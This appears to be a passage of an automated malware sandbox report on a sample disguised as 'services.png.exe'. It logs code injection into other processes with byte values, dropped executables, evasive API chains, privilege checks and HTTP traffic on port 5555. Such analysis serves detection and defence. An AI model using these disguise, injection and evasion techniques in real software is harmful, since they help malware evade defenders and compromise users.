                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 228015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 228016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2520000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2520011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A4003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A4006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A4007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A4008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A400A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A400B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A400C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A400D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A400DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A400EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A400FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A4010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A4015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A4016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2A40187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2E20000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 2E20011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Users\user\Desktop\services.png.exeFile created: C:\Users\user\AppData\Local\Temp\tmp79c95342.batJump to dropped file
                        Source: Possible double extension: png.exeStatic PE information: services.png.exe
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 5555
                        Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 49896
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 5555
                        Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 49914
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 5555
                        Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 49952
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0040F336 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_0040F336
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Xigi OvdaJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: C:\Users\user\Desktop\services.png.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-49793
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-26918
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-26918
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-26968
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\services.png.exeFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
                        Source: SearchApp.exe, 0000000A.00000003.1899723944.0000024340D8D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FIDDLER2\FIDDLER.EXE39691VIDEOPIX.MOVIEMAKERFREEVIDEOEDITOR_DXZ7H1QND1PGE!APP
                        Source: SearchApp.exe, 0000000A.00000003.1899723944.0000024340D8D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FIDDLER2\FIDDLER.EXE
                        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeWindow / User API: threadDelayed 823
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeWindow / User API: threadDelayed 825
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeWindow / User API: threadDelayed 824
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeWindow / User API: threadDelayed 825
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeWindow / User API: threadDelayed 825
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp7e3ae9cd\smbhost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\services.png.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp3858.tmpJump to dropped file
                        Source: C:\Users\user\Desktop\services.png.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp3809.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SearchUI[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp4623.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\smbhost[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpa49210ef\SearchUI.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp45F4.tmpJump to dropped file
                        Source: C:\Users\user\Desktop\services.png.exeEvaded block: after key decisiongraph_0-49453
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeEvaded block: after key decisiongraph_1-27218
                        Source: C:\Windows\System32\ctfmon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                        Source: C:\Windows\System32\RuntimeBroker.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                        Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-26855
                        Source: C:\Users\user\Desktop\services.png.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-50115
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-26972
                        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
                        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.4 %
                        Source: C:\Windows\System32\ctfmon.exeAPI coverage: 5.0 %
                        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.9 %
                        Source: C:\Windows\System32\RuntimeBroker.exeAPI coverage: 8.0 %
                        Source: C:\Windows\System32\RuntimeBroker.exeAPI coverage: 3.8 %
                        Source: C:\Windows\System32\RuntimeBroker.exeAPI coverage: 3.7 %
                        Source: C:\Windows\System32\RuntimeBroker.exeAPI coverage: 4.9 %
                        Source: C:\Users\user\Desktop\services.png.exe TID: 6464Thread sleep count: 83 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 928Thread sleep count: 82 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 7956Thread sleep count: 34 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 7956Thread sleep count: 39 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 7956Thread sleep count: 33 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 7956Thread sleep count: 66 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 7956Thread sleep count: 60 > 30Jump to behavior
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 2188Thread sleep count: 104 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 3064Thread sleep count: 104 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 6544Thread sleep count: 104 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 2212Thread sleep count: 132 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 4048Thread sleep count: 103 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 2364Thread sleep count: 125 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 2364Thread sleep count: 133 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 6248Thread sleep count: 133 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 6444Thread sleep count: 104 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 6444Thread sleep count: 825 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 6488Thread sleep count: 824 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 1104Thread sleep count: 104 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 1104Thread sleep count: 825 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 4124Thread sleep count: 104 > 30
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 4124Thread sleep count: 825 > 30
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeLast function: Thread delayed
                        Source: C:\Windows\System32\sihost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\ctfmon.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
                        Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
                        Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
                        Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
                        Source: C:\Windows\System32\ApplicationFrameHost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
                        Source: C:\Windows\System32\oobe\UserOOBEBroker.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00414ADD FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,0_2_00414ADD
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_004394BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_004394BB
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00439576 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00439576
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02849576 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_02849576
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02824ADD FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,0_2_02824ADD
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_028494BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_028494BB
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00414ADD WaitForSingleObject,FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,1_2_00414ADD
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00414A30 FindFirstFileW,1_2_00414A30
